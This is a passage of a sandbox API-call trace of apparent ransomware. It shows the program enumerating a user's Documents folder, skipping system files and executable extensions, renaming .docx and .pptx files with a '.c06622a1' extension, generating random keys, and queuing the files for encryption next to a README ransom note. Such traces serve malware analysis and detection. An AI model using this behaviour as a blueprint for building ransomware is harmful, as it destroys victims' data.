NumberOfConcurrentThreads=0x0) returned 0x5dc [0149.785] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x55a0020 [0149.792] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6d36be18 [0149.792] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x390b9703 [0149.792] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x26752223 [0149.792] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x72ff8dd9 [0149.792] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xce13c6e [0149.792] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x697955e6 [0149.792] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x100b9d5e [0149.792] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x78e511db [0149.795] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x55a0094, Length=0x80) returned 0x5bb78683 [0149.795] RtlComputeCrc32 (PartialCrc=0x8683, Buffer=0x55a0094, Length=0x80) returned 0x3911deb8 [0149.795] RtlComputeCrc32 (PartialCrc=0xdeb8, Buffer=0x55a0094, Length=0x80) returned 0x70bd2fd1 [0149.795] RtlComputeCrc32 (PartialCrc=0x2fd1, Buffer=0x55a0094, Length=0x80) returned 0x77972c93 [0149.795] RtlComputeCrc32 (PartialCrc=0x2c93, Buffer=0x55a0094, Length=0x80) returned 0xdfe14b5e [0149.796] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x55a0020) returned 1 [0149.796] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0149.796] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0149.796] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x231b1250, ftCreationTime.dwHighDateTime=0x1d57f22, ftLastAccessTime.dwLowDateTime=0x6cb55620, ftLastAccessTime.dwHighDateTime=0x1d595aa, ftLastWriteTime.dwLowDateTime=0x6cb55620, ftLastWriteTime.dwHighDateTime=0x1d595aa, nFileSizeHigh=0x0, nFileSizeLow=0xf96f, dwReserved0=0x0, dwReserved1=0x0, cFileName="uxEyj1w3yyg.docx", cAlternateFileName="UXEYJ1~1.DOC")) returned 1 [0149.796] _wcsicmp (_Str1="uxEyj1w3yyg.docx", _Str2="README.c06622a1.TXT") returned 3 [0149.796] wcsstr (_Str="uxEyj1w3yyg.docx", _SubStr="README") returned 0x0 [0149.796] _wcsicmp (_Str1="autorun.inf", _Str2="uxEyj1w3yyg.docx") returned -20 [0149.796] wcslen (_String="autorun.inf") returned 0xb [0149.796] _wcsicmp (_Str1="boot.ini", _Str2="uxEyj1w3yyg.docx") returned -19 [0149.796] wcslen (_String="boot.ini") returned 0x8 [0149.796] _wcsicmp (_Str1="bootfont.bin", _Str2="uxEyj1w3yyg.docx") returned -19 [0149.796] wcslen (_String="bootfont.bin") returned 0xc [0149.796] _wcsicmp (_Str1="bootsect.bak", _Str2="uxEyj1w3yyg.docx") returned -19 [0149.796] wcslen (_String="bootsect.bak") returned 0xc [0149.796] _wcsicmp (_Str1="desktop.ini", _Str2="uxEyj1w3yyg.docx") returned -17 [0149.796] wcslen (_String="desktop.ini") returned 0xb [0149.796] _wcsicmp (_Str1="iconcache.db", _Str2="uxEyj1w3yyg.docx") returned -12 [0149.796] wcslen (_String="iconcache.db") returned 0xc [0149.796] _wcsicmp (_Str1="ntldr", _Str2="uxEyj1w3yyg.docx") returned -7 [0149.796] wcslen (_String="ntldr") returned 0x5 [0149.796] _wcsicmp (_Str1="ntuser.dat", _Str2="uxEyj1w3yyg.docx") returned -7 [0149.797] wcslen (_String="ntuser.dat") returned 0xa [0149.797] _wcsicmp (_Str1="ntuser.dat.log", _Str2="uxEyj1w3yyg.docx") returned -7 [0149.797] wcslen (_String="ntuser.dat.log") returned 0xe [0149.797] _wcsicmp (_Str1="ntuser.ini", _Str2="uxEyj1w3yyg.docx") returned -7 [0149.797] wcslen (_String="ntuser.ini") returned 0xa [0149.797] _wcsicmp (_Str1="thumbs.db", _Str2="uxEyj1w3yyg.docx") returned -1 [0149.797] wcslen (_String="thumbs.db") returned 0x9 [0149.797] _wcsicmp (_Str1="386", _Str2="docx") returned -49 [0149.797] wcslen (_String="386") returned 0x3 [0149.797] _wcsicmp (_Str1="adv", _Str2="docx") returned -3 [0149.797] wcslen (_String="adv") returned 0x3 [0149.797] _wcsicmp (_Str1="ani", _Str2="docx") returned -3 [0149.797] wcslen (_String="ani") returned 0x3 [0149.797] _wcsicmp (_Str1="bat", _Str2="docx") returned -2 [0149.797] wcslen (_String="bat") returned 0x3 [0149.797] _wcsicmp (_Str1="bin", _Str2="docx") returned -2 [0149.797] wcslen (_String="bin") returned 0x3 [0149.797] _wcsicmp (_Str1="cab", _Str2="docx") returned -1 [0149.797] wcslen (_String="cab") returned 0x3 [0149.797] _wcsicmp (_Str1="cmd", _Str2="docx") returned -1 [0149.797] wcslen (_String="cmd") returned 0x3 [0149.797] _wcsicmp (_Str1="com", _Str2="docx") returned -1 [0149.797] wcslen (_String="com") returned 0x3 [0149.797] _wcsicmp (_Str1="cpl", _Str2="docx") returned -1 [0149.798] wcslen (_String="cpl") returned 0x3 [0149.798] _wcsicmp (_Str1="cur", _Str2="docx") returned -1 [0149.798] wcslen (_String="cur") returned 0x3 [0149.798] _wcsicmp (_Str1="deskthemepack", _Str2="docx") returned -10 [0149.798] wcslen (_String="deskthemepack") returned 0xd [0149.798] _wcsicmp (_Str1="diagcab", _Str2="docx") returned -6 [0149.798] wcslen (_String="diagcab") returned 0x7 [0149.798] _wcsicmp (_Str1="diagcfg", _Str2="docx") returned -6 [0149.798] wcslen (_String="diagcfg") returned 0x7 [0149.798] _wcsicmp (_Str1="diagpkg", _Str2="docx") returned -6 [0149.798] wcslen (_String="diagpkg") returned 0x7 [0149.798] _wcsicmp (_Str1="dll", _Str2="docx") returned -3 [0149.798] wcslen (_String="dll") returned 0x3 [0149.798] _wcsicmp (_Str1="drv", _Str2="docx") returned 3 [0149.798] wcslen (_String="drv") returned 0x3 [0149.798] _wcsicmp (_Str1="exe", _Str2="docx") returned 1 [0149.798] wcslen (_String="exe") returned 0x3 [0149.798] _wcsicmp (_Str1="hlp", _Str2="docx") returned 4 [0149.798] wcslen (_String="hlp") returned 0x3 [0149.798] _wcsicmp (_Str1="icl", _Str2="docx") returned 5 [0149.798] wcslen (_String="icl") returned 0x3 [0149.798] _wcsicmp (_Str1="icns", _Str2="docx") returned 5 [0149.798] wcslen (_String="icns") returned 0x4 [0149.798] _wcsicmp (_Str1="ico", _Str2="docx") returned 5 [0149.798] wcslen (_String="ico") returned 0x3 [0149.798] _wcsicmp (_Str1="ics", _Str2="docx") returned 5 [0149.799] wcslen (_String="ics") returned 0x3 [0149.799] _wcsicmp (_Str1="idx", _Str2="docx") returned 5 [0149.799] wcslen (_String="idx") returned 0x3 [0149.799] _wcsicmp (_Str1="ldf", _Str2="docx") returned 8 [0149.799] wcslen (_String="ldf") returned 0x3 [0149.799] _wcsicmp (_Str1="lnk", _Str2="docx") returned 8 [0149.799] wcslen (_String="lnk") returned 0x3 [0149.799] _wcsicmp (_Str1="mod", _Str2="docx") returned 9 [0149.799] wcslen (_String="mod") returned 0x3 [0149.799] _wcsicmp (_Str1="mpa", _Str2="docx") returned 9 [0149.799] wcslen (_String="mpa") returned 0x3 [0149.799] _wcsicmp (_Str1="msc", _Str2="docx") returned 9 [0149.799] wcslen (_String="msc") returned 0x3 [0149.799] _wcsicmp (_Str1="msp", _Str2="docx") returned 9 [0149.799] wcslen (_String="msp") returned 0x3 [0149.799] _wcsicmp (_Str1="msstyles", _Str2="docx") returned 9 [0149.799] wcslen (_String="msstyles") returned 0x8 [0149.799] _wcsicmp (_Str1="msu", _Str2="docx") returned 9 [0149.799] wcslen (_String="msu") returned 0x3 [0149.799] _wcsicmp (_Str1="nls", _Str2="docx") returned 10 [0149.799] wcslen (_String="nls") returned 0x3 [0149.799] _wcsicmp (_Str1="nomedia", _Str2="docx") returned 10 [0149.799] wcslen (_String="nomedia") returned 0x7 [0149.799] _wcsicmp (_Str1="ocx", _Str2="docx") returned 11 [0149.799] wcslen (_String="ocx") returned 0x3 [0149.800] _wcsicmp (_Str1="prf", _Str2="docx") returned 12 [0149.800] wcslen (_String="prf") returned 0x3 [0149.800] _wcsicmp (_Str1="ps1", _Str2="docx") returned 12 [0149.800] wcslen (_String="ps1") returned 0x3 [0149.800] _wcsicmp (_Str1="rom", _Str2="docx") returned 14 [0149.800] wcslen (_String="rom") returned 0x3 [0149.800] _wcsicmp (_Str1="rtp", _Str2="docx") returned 14 [0149.800] wcslen (_String="rtp") returned 0x3 [0149.800] _wcsicmp (_Str1="scr", _Str2="docx") returned 15 [0149.800] wcslen (_String="scr") returned 0x3 [0149.800] _wcsicmp (_Str1="shs", _Str2="docx") returned 15 [0149.800] wcslen (_String="shs") returned 0x3 [0149.800] _wcsicmp (_Str1="spl", _Str2="docx") returned 15 [0149.800] wcslen (_String="spl") returned 0x3 [0149.800] _wcsicmp (_Str1="sys", _Str2="docx") returned 15 [0149.800] wcslen (_String="sys") returned 0x3 [0149.800] _wcsicmp (_Str1="theme", _Str2="docx") returned 16 [0149.800] wcslen (_String="theme") returned 0x5 [0149.800] _wcsicmp (_Str1="themepack", _Str2="docx") returned 16 [0149.800] wcslen (_String="themepack") returned 0x9 [0149.800] _wcsicmp (_Str1="wpx", _Str2="docx") returned 19 [0149.800] wcslen (_String="wpx") returned 0x3 [0149.800] _wcsicmp (_Str1="lock", _Str2="docx") returned 8 [0149.800] wcslen (_String="lock") returned 0x4 [0149.800] _wcsicmp (_Str1="key", _Str2="docx") returned 7 [0149.801] wcslen (_String="key") returned 0x3 [0149.801] _wcsicmp (_Str1="hta", _Str2="docx") returned 4 [0149.801] wcslen (_String="hta") returned 0x3 [0149.801] _wcsicmp (_Str1="msi", _Str2="docx") returned 9 [0149.801] wcslen (_String="msi") returned 0x3 [0149.801] _wcsicmp (_Str1="pdb", _Str2="docx") returned 12 [0149.801] wcslen (_String="pdb") returned 0x3 [0149.801] _wcsicmp (_Str1="sql", _Str2="docx") returned 15 [0149.801] wcslen (_String="sql") returned 0x3 [0149.801] _wcsicmp (_Str1="sqlite", _Str2="docx") returned 15 [0149.801] wcslen (_String="sqlite") returned 0x6 [0149.801] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0149.801] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0149.801] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0149.801] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x2b [0149.801] wcscpy (in: _Dest=0x44d00d0, _Source="uxEyj1w3yyg.docx" | out: _Dest="uxEyj1w3yyg.docx") returned="uxEyj1w3yyg.docx" [0149.801] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uxEyj1w3yyg.docx", dwFileAttributes=0x80) returned 1 [0149.802] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uxEyj1w3yyg.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\uxeyj1w3yyg.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x678 [0149.802] SetFilePointerEx (in: hFile=0x678, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.802] ReadFile (in: hFile=0x678, lpBuffer=0x3feb74, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fec04, lpOverlapped=0x0 | out: lpBuffer=0x3feb74*, lpNumberOfBytesRead=0x3fec04*=0x90, lpOverlapped=0x0) returned 1 [0149.803] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3feb74, Length=0x80) returned 0xd8faf2e3 [0149.803] RtlComputeCrc32 (PartialCrc=0xf2e3, Buffer=0x3feb74, Length=0x80) returned 0x8b7b1505 [0149.803] RtlComputeCrc32 (PartialCrc=0x1505, Buffer=0x3feb74, Length=0x80) returned 0x6f40fd6 [0149.803] RtlComputeCrc32 (PartialCrc=0xfd6, Buffer=0x3feb74, Length=0x80) returned 0xa17c4f73 [0149.803] RtlComputeCrc32 (PartialCrc=0x4f73, Buffer=0x3feb74, Length=0x80) returned 0xfb62633f [0149.803] CloseHandle (hObject=0x678) returned 1 [0149.803] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0149.803] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uxEyj1w3yyg.docx" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uxEyj1w3yyg.docx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uxEyj1w3yyg.docx" [0149.803] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uxEyj1w3yyg.docx") returned 0x3c [0149.803] wcscpy (in: _Dest=0x44e00f8, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0149.803] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uxEyj1w3yyg.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\uxeyj1w3yyg.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uxEyj1w3yyg.docx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\uxeyj1w3yyg.docx.c06622a1"), dwFlags=0x8) returned 1 [0149.806] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uxEyj1w3yyg.docx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\uxeyj1w3yyg.docx.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x678 [0149.806] CreateIoCompletionPort (FileHandle=0x678, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0149.806] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x5630020 [0149.813] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x64abd4cb [0149.813] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x71b61d23 [0149.813] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x38d89bad [0149.813] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5f2eef25 [0149.813] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x137b0943 [0149.813] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5cd43dbe [0149.813] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x43d4ab9b [0149.813] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x541a8e27 [0149.816] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x5630094, Length=0x80) returned 0x600a9a21 [0149.816] RtlComputeCrc32 (PartialCrc=0x9a21, Buffer=0x5630094, Length=0x80) returned 0xb1afc43b [0149.816] RtlComputeCrc32 (PartialCrc=0xc43b, Buffer=0x5630094, Length=0x80) returned 0xae30ac9b [0149.816] RtlComputeCrc32 (PartialCrc=0xac9b, Buffer=0x5630094, Length=0x80) returned 0x5037e03 [0149.816] RtlComputeCrc32 (PartialCrc=0x7e03, Buffer=0x5630094, Length=0x80) returned 0xbf9651af [0149.816] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x5630020) returned 1 [0149.816] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0149.817] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0149.817] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b3fece0, ftCreationTime.dwHighDateTime=0x1d5af4f, ftLastAccessTime.dwLowDateTime=0x8e27f470, ftLastAccessTime.dwHighDateTime=0x1d58b2d, ftLastWriteTime.dwLowDateTime=0x8e27f470, ftLastWriteTime.dwHighDateTime=0x1d58b2d, nFileSizeHigh=0x0, nFileSizeLow=0x59ba, dwReserved0=0x0, dwReserved1=0x0, cFileName="XTN2PFb A9PsJ3IYh2i.pptx", cAlternateFileName="XTN2PF~1.PPT")) returned 1 [0149.817] _wcsicmp (_Str1="XTN2PFb A9PsJ3IYh2i.pptx", _Str2="README.c06622a1.TXT") returned 6 [0149.817] wcsstr (_Str="XTN2PFb A9PsJ3IYh2i.pptx", _SubStr="README") returned 0x0 [0149.817] _wcsicmp (_Str1="autorun.inf", _Str2="XTN2PFb A9PsJ3IYh2i.pptx") returned -23 [0149.817] wcslen (_String="autorun.inf") returned 0xb [0149.817] _wcsicmp (_Str1="boot.ini", _Str2="XTN2PFb A9PsJ3IYh2i.pptx") returned -22 [0149.817] wcslen (_String="boot.ini") returned 0x8 [0149.817] _wcsicmp (_Str1="bootfont.bin", _Str2="XTN2PFb A9PsJ3IYh2i.pptx") returned -22 [0149.817] wcslen (_String="bootfont.bin") returned 0xc [0149.817] _wcsicmp (_Str1="bootsect.bak", _Str2="XTN2PFb A9PsJ3IYh2i.pptx") returned -22 [0149.817] wcslen (_String="bootsect.bak") returned 0xc [0149.817] _wcsicmp (_Str1="desktop.ini", _Str2="XTN2PFb A9PsJ3IYh2i.pptx") returned -20 [0149.817] wcslen (_String="desktop.ini") returned 0xb [0149.817] _wcsicmp (_Str1="iconcache.db", _Str2="XTN2PFb A9PsJ3IYh2i.pptx") returned -15 [0149.817] wcslen (_String="iconcache.db") returned 0xc [0149.817] _wcsicmp (_Str1="ntldr", _Str2="XTN2PFb A9PsJ3IYh2i.pptx") returned -10 [0149.817] wcslen (_String="ntldr") returned 0x5 [0149.817] _wcsicmp (_Str1="ntuser.dat", _Str2="XTN2PFb A9PsJ3IYh2i.pptx") returned -10 [0149.817] wcslen (_String="ntuser.dat") returned 0xa [0149.817] _wcsicmp (_Str1="ntuser.dat.log", _Str2="XTN2PFb A9PsJ3IYh2i.pptx") returned -10 [0149.817] wcslen (_String="ntuser.dat.log") returned 0xe [0149.817] _wcsicmp (_Str1="ntuser.ini", _Str2="XTN2PFb A9PsJ3IYh2i.pptx") returned -10 [0149.817] wcslen (_String="ntuser.ini") returned 0xa [0149.818] _wcsicmp (_Str1="thumbs.db", _Str2="XTN2PFb A9PsJ3IYh2i.pptx") returned -4 [0149.818] wcslen (_String="thumbs.db") returned 0x9 [0149.818] _wcsicmp (_Str1="386", _Str2="pptx") returned -61 [0149.818] wcslen (_String="386") returned 0x3 [0149.818] _wcsicmp (_Str1="adv", _Str2="pptx") returned -15 [0149.818] wcslen (_String="adv") returned 0x3 [0149.818] _wcsicmp (_Str1="ani", _Str2="pptx") returned -15 [0149.818] wcslen (_String="ani") returned 0x3 [0149.818] _wcsicmp (_Str1="bat", _Str2="pptx") returned -14 [0149.818] wcslen (_String="bat") returned 0x3 [0149.818] _wcsicmp (_Str1="bin", _Str2="pptx") returned -14 [0149.818] wcslen (_String="bin") returned 0x3 [0149.818] _wcsicmp (_Str1="cab", _Str2="pptx") returned -13 [0149.818] wcslen (_String="cab") returned 0x3 [0149.818] _wcsicmp (_Str1="cmd", _Str2="pptx") returned -13 [0149.818] wcslen (_String="cmd") returned 0x3 [0149.818] _wcsicmp (_Str1="com", _Str2="pptx") returned -13 [0149.818] wcslen (_String="com") returned 0x3 [0149.818] _wcsicmp (_Str1="cpl", _Str2="pptx") returned -13 [0149.818] wcslen (_String="cpl") returned 0x3 [0149.818] _wcsicmp (_Str1="cur", _Str2="pptx") returned -13 [0149.818] wcslen (_String="cur") returned 0x3 [0149.818] _wcsicmp (_Str1="deskthemepack", _Str2="pptx") returned -12 [0149.818] wcslen (_String="deskthemepack") returned 0xd [0149.818] _wcsicmp (_Str1="diagcab", _Str2="pptx") returned -12 [0149.819] wcslen (_String="diagcab") returned 0x7 [0149.819] _wcsicmp (_Str1="diagcfg", _Str2="pptx") returned -12 [0149.819] wcslen (_String="diagcfg") returned 0x7 [0149.819] _wcsicmp (_Str1="diagpkg", _Str2="pptx") returned -12 [0149.819] wcslen (_String="diagpkg") returned 0x7 [0149.819] _wcsicmp (_Str1="dll", _Str2="pptx") returned -12 [0149.819] wcslen (_String="dll") returned 0x3 [0149.819] _wcsicmp (_Str1="drv", _Str2="pptx") returned -12 [0149.819] wcslen (_String="drv") returned 0x3 [0149.819] _wcsicmp (_Str1="exe", _Str2="pptx") returned -11 [0149.819] wcslen (_String="exe") returned 0x3 [0149.819] _wcsicmp (_Str1="hlp", _Str2="pptx") returned -8 [0149.819] wcslen (_String="hlp") returned 0x3 [0149.819] _wcsicmp (_Str1="icl", _Str2="pptx") returned -7 [0149.819] wcslen (_String="icl") returned 0x3 [0149.819] _wcsicmp (_Str1="icns", _Str2="pptx") returned -7 [0149.819] wcslen (_String="icns") returned 0x4 [0149.819] _wcsicmp (_Str1="ico", _Str2="pptx") returned -7 [0149.819] wcslen (_String="ico") returned 0x3 [0149.819] _wcsicmp (_Str1="ics", _Str2="pptx") returned -7 [0149.819] wcslen (_String="ics") returned 0x3 [0149.819] _wcsicmp (_Str1="idx", _Str2="pptx") returned -7 [0149.819] wcslen (_String="idx") returned 0x3 [0149.819] _wcsicmp (_Str1="ldf", _Str2="pptx") returned -4 [0149.819] wcslen (_String="ldf") returned 0x3 [0149.819] _wcsicmp (_Str1="lnk", _Str2="pptx") returned -4 [0149.820] wcslen (_String="lnk") returned 0x3 [0149.820] _wcsicmp (_Str1="mod", _Str2="pptx") returned -3 [0149.820] wcslen (_String="mod") returned 0x3 [0149.820] _wcsicmp (_Str1="mpa", _Str2="pptx") returned -3 [0149.820] wcslen (_String="mpa") returned 0x3 [0149.820] _wcsicmp (_Str1="msc", _Str2="pptx") returned -3 [0149.820] wcslen (_String="msc") returned 0x3 [0149.820] _wcsicmp (_Str1="msp", _Str2="pptx") returned -3 [0149.820] wcslen (_String="msp") returned 0x3 [0149.820] _wcsicmp (_Str1="msstyles", _Str2="pptx") returned -3 [0149.820] wcslen (_String="msstyles") returned 0x8 [0149.820] _wcsicmp (_Str1="msu", _Str2="pptx") returned -3 [0149.820] wcslen (_String="msu") returned 0x3 [0149.820] _wcsicmp (_Str1="nls", _Str2="pptx") returned -2 [0149.820] wcslen (_String="nls") returned 0x3 [0149.820] _wcsicmp (_Str1="nomedia", _Str2="pptx") returned -2 [0149.820] wcslen (_String="nomedia") returned 0x7 [0149.820] _wcsicmp (_Str1="ocx", _Str2="pptx") returned -1 [0149.820] wcslen (_String="ocx") returned 0x3 [0149.820] _wcsicmp (_Str1="prf", _Str2="pptx") returned 2 [0149.820] wcslen (_String="prf") returned 0x3 [0149.820] _wcsicmp (_Str1="ps1", _Str2="pptx") returned 3 [0149.820] wcslen (_String="ps1") returned 0x3 [0149.820] _wcsicmp (_Str1="rom", _Str2="pptx") returned 2 [0149.820] wcslen (_String="rom") returned 0x3 [0149.820] _wcsicmp (_Str1="rtp", _Str2="pptx") returned 2 [0149.821] wcslen (_String="rtp") returned 0x3 [0149.821] _wcsicmp (_Str1="scr", _Str2="pptx") returned 3 [0149.821] wcslen (_String="scr") returned 0x3 [0149.821] _wcsicmp (_Str1="shs", _Str2="pptx") returned 3 [0149.821] wcslen (_String="shs") returned 0x3 [0149.821] _wcsicmp (_Str1="spl", _Str2="pptx") returned 3 [0149.821] wcslen (_String="spl") returned 0x3 [0149.821] _wcsicmp (_Str1="sys", _Str2="pptx") returned 3 [0149.821] wcslen (_String="sys") returned 0x3 [0149.821] _wcsicmp (_Str1="theme", _Str2="pptx") returned 4 [0149.821] wcslen (_String="theme") returned 0x5 [0149.821] _wcsicmp (_Str1="themepack", _Str2="pptx") returned 4 [0149.821] wcslen (_String="themepack") returned 0x9 [0149.821] _wcsicmp (_Str1="wpx", _Str2="pptx") returned 7 [0149.821] wcslen (_String="wpx") returned 0x3 [0149.821] _wcsicmp (_Str1="lock", _Str2="pptx") returned -4 [0149.821] wcslen (_String="lock") returned 0x4 [0149.821] _wcsicmp (_Str1="key", _Str2="pptx") returned -5 [0149.821] wcslen (_String="key") returned 0x3 [0149.821] _wcsicmp (_Str1="hta", _Str2="pptx") returned -8 [0149.821] wcslen (_String="hta") returned 0x3 [0149.821] _wcsicmp (_Str1="msi", _Str2="pptx") returned -3 [0149.821] wcslen (_String="msi") returned 0x3 [0149.821] _wcsicmp (_Str1="pdb", _Str2="pptx") returned -12 [0149.821] wcslen (_String="pdb") returned 0x3 [0149.822] _wcsicmp (_Str1="sql", _Str2="pptx") returned 3 [0149.822] wcslen (_String="sql") returned 0x3 [0149.822] _wcsicmp (_Str1="sqlite", _Str2="pptx") returned 3 [0149.822] wcslen (_String="sqlite") returned 0x6 [0149.822] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0149.822] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0149.822] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0149.822] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x2b [0149.822] wcscpy (in: _Dest=0x44d00d0, _Source="XTN2PFb A9PsJ3IYh2i.pptx" | out: _Dest="XTN2PFb A9PsJ3IYh2i.pptx") returned="XTN2PFb A9PsJ3IYh2i.pptx" [0149.822] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\XTN2PFb A9PsJ3IYh2i.pptx", dwFileAttributes=0x80) returned 1 [0149.822] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\XTN2PFb A9PsJ3IYh2i.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xtn2pfb a9psj3iyh2i.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x67c [0149.822] SetFilePointerEx (in: hFile=0x67c, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.823] ReadFile (in: hFile=0x67c, lpBuffer=0x3feb74, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fec04, lpOverlapped=0x0 | out: lpBuffer=0x3feb74*, lpNumberOfBytesRead=0x3fec04*=0x90, lpOverlapped=0x0) returned 1 [0149.823] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3feb74, Length=0x80) returned 0x620fd357 [0149.823] RtlComputeCrc32 (PartialCrc=0xd357, Buffer=0x3feb74, Length=0x80) returned 0xff478dc9 [0149.823] RtlComputeCrc32 (PartialCrc=0x8dc9, Buffer=0x3feb74, Length=0x80) returned 0x997d4068 [0149.823] RtlComputeCrc32 (PartialCrc=0x4068, Buffer=0x3feb74, Length=0x80) returned 0xf70161ab [0149.823] RtlComputeCrc32 (PartialCrc=0x61ab, Buffer=0x3feb74, Length=0x80) returned 0xd91922b [0149.824] CloseHandle (hObject=0x67c) returned 1 [0149.824] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0149.824] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\XTN2PFb A9PsJ3IYh2i.pptx" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\XTN2PFb A9PsJ3IYh2i.pptx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\XTN2PFb 